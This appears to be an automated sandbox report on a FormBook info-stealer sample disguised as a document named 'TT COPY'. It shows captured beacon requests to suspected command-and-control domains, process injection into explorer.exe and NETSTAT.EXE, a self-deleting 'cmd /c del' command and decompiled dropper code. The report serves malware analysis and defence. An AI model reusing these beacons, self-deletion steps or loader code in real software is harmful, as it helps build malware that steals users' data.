Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49820	37.123.118.150	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 17:50:07.020860910 CET	8384	OUT	GET /e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz HTTP/1.1 Host: www.blttsperma.quest Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 17:50:07.050486088 CET	8385	IN	HTTP/1.1 403 Forbidden Server: nginx/1.10.3 (Ubuntu) Date: Thu, 25 Nov 2021 16:50:07 GMT Content-Type: text/html Content-Length: 178 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49824	143.95.80.65	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 17:50:17.640515089 CET	8395	OUT	GET /e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz HTTP/1.1 Host: www.intelldat.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 17:50:17.792484999 CET	8396	IN	HTTP/1.1 500 Internal Server Error Date: Thu, 25 Nov 2021 16:50:17 GMT Server: Apache Content-Length: 7309 Connection: close Content-Type: text/html Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 35 30 39 20 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 48 31 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>
Nov 25, 2021 17:50:17.792517900 CET	8398	IN	Data Raw: 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a Data Ascii:
Nov 25, 2021 17:50:17.792548895 CET	8399	IN	Data Raw: 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 Data Ascii:
Nov 25, 2021 17:50:17.792577982 CET	8400	IN	Data Raw: 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 Data Ascii:
Nov 25, 2021 17:50:17.792601109 CET	8402	IN	Data Raw: 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 Data Ascii:
Nov 25, 2021 17:50:17.792625904 CET	8403	IN	Data Raw: 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 Data Ascii:

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: TT COPY_02101011.exe PID: 6584 Parent PID: 5864

General

Start time:	17:48:22
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\TT COPY_02101011.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TT COPY_02101011.exe"
Imagebase:	0x400000
File size:	309491 bytes
MD5 hash:	EBABC0D66A9E01CC0926F3B311FEFF5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: TT COPY_02101011.exe PID: 6644 Parent PID: 6584

General

Start time:	17:48:24
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\TT COPY_02101011.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TT COPY_02101011.exe"
Imagebase:	0x400000
File size:	309491 bytes
MD5 hash:	EBABC0D66A9E01CC0926F3B311FEFF5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 6644

General

Start time:	17:48:28
Start date:	25/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: autoconv.exe PID: 6712 Parent PID: 3424

General

Start time:	17:48:52
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autoconv.exe
Imagebase:	0xef0000
File size:	851968 bytes
MD5 hash:	4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: NETSTAT.EXE PID: 744 Parent PID: 3424

General

Start time:	17:48:53
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0xea0000
File size:	32768 bytes
MD5 hash:	4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7080 Parent PID: 744

General

Start time:	17:48:57
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 808 Parent PID: 7080

General

Start time:	17:48:59
Start date:	25/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: TT COPY_02101011.exe PID: 6584 Parent PID: 5864 TT COPY_02101011.exeCOMMON

Executed Functions

Function 004030E3, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Download Yara Rule

C-Code - Quality: 83%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x42ec18 = _t34;
				 *0x42eb64 = E00405C49(8);
				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
				E0040592B("pewdd Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\jones\\Desktop\\TT COPY_02101011.exe\" ";
				E0040592B(_t96, _t39);
				 *0x42eb60 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\jones\\Desktop\\TT COPY_02101011.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00434001;
				}
				_t44 = CharNextA(E00405449(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405449(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004030AF(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C0B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E00403464();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x42ebf4; // 0x0
											if(__eflags != 0) {
												_t106 = E00405C49(3);
												_t100 = E00405C49(4);
												_t55 = E00405C49(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x42ec0c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E004051EC(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x42eb7c; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
										_v400 = E00403489();
										goto L32;
									}
									_t103 = E00405449(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\jones\\Desktop";
										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t101);
										}
										E0040592B(0x42f000, _v396);
										 *0x42f400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x42eb70; // 0x571350
											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x428b90);
											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\TT COPY_02101011.exe", 0x428b90, 1) != 0) {
												_push(0);
												_push(0x428b90);
												E00405679();
												_t77 =  *0x42eb70; // 0x571350
												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E0040518B(0x428b90);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x42f400 =  *0x42f400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E00405679();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E004054FF(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004030AF(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x004030ef
0x004030f3
0x004030fb
0x004030fd
0x00403102
0x0040310d
0x00403114
0x0040311c
0x00403126
0x0040313c
0x0040314c
0x00403151
0x00403157
0x0040315e
0x00403171
0x00403176
0x00403178
0x0040317a
0x0040317f
0x0040317f
0x0040318f
0x00403195
0x004031fe
0x004031fe
0x00403200
0x00403202
0x00000000
0x00000000
0x0040319b
0x0040319e
0x004031a6
0x004031a6
0x004031a9
0x004031ae
0x004031b0
0x004031b0
0x004031b1
0x004031b1
0x004031b6
0x004031b9
0x004031ee
0x004031f3
0x004031f8
0x004031fb
0x004031fd
0x004031fd
0x004031fd
0x00000000
0x004031bb
0x004031bb
0x004031bc
0x004031bf
0x004031c7
0x004031ca
0x004031cc
0x004031cc
0x004031cc
0x004031ca
0x004031cf
0x004031d5
0x004031dd
0x004031e0
0x004031e2
0x004031e2
0x004031e2
0x004031e0
0x004031e5
0x004031ec
0x00403206
0x00403209
0x00403209
0x00403212
0x00403217
0x00403217
0x00403222
0x00403228
0x0040322d
0x0040322f
0x00403251
0x00403256
0x0040325d
0x00403264
0x00403268
0x004032cf
0x004032cf
0x004032d4
0x004032de
0x004033c9
0x004033cf
0x004033da
0x004033e3
0x004033e5
0x004033ea
0x004033ec
0x004033ee
0x004033f0
0x004033f2
0x004033f4
0x004033f6
0x00403406
0x00403408
0x0040340a
0x00403417
0x00403426
0x0040342e
0x00403436
0x00403436
0x0040340a
0x004033f6
0x004033f2
0x0040343b
0x00403441
0x00403443
0x00403447
0x00403447
0x00403443
0x0040344c
0x00403451
0x00403454
0x00403456
0x00403456
0x0040345e
0x0040345e
0x004032ed
0x004032f4
0x004032f4
0x0040326a
0x00403270
0x004032bf
0x004032bf
0x004032cb
0x00000000
0x004032cb
0x00403279
0x00403286
0x0040327d
0x00403283
0x00000000
0x00000000
0x00403285
0x00403285
0x00403285
0x0040328a
0x0040328c
0x00403294
0x00403300
0x00403305
0x00403314
0x00000000
0x00000000
0x00403318
0x0040331f
0x00403325
0x0040332b
0x00403333
0x00403333
0x00403341
0x00403348
0x00403351
0x00403357
0x00403357
0x00403363
0x00403369
0x00403373
0x00403387
0x00403388
0x00403389
0x0040338e
0x0040339a
0x004033a0
0x004033a7
0x004033aa
0x004033b0
0x004033b0
0x004033a7
0x004033b4
0x004033ba
0x004033ba
0x004033bd
0x004033be
0x004033bf
0x00000000
0x004033bf
0x00403296
0x00403298
0x004032a3
0x00000000
0x00000000
0x004032ab
0x004032b6
0x004032bb
0x00000000
0x004032bb
0x00403237
0x00403243
0x00403248
0x0040324d
0x0040324f
0x00000000
0x00000000
0x00000000
0x0040324f
0x00000000
0x004031ec
0x00000000
0x00000000
0x00000000
0x004031a0
0x004031a0
0x004031a0
0x004031a1
0x004031a1
0x00000000
0x004031a0
0x00000000

APIs

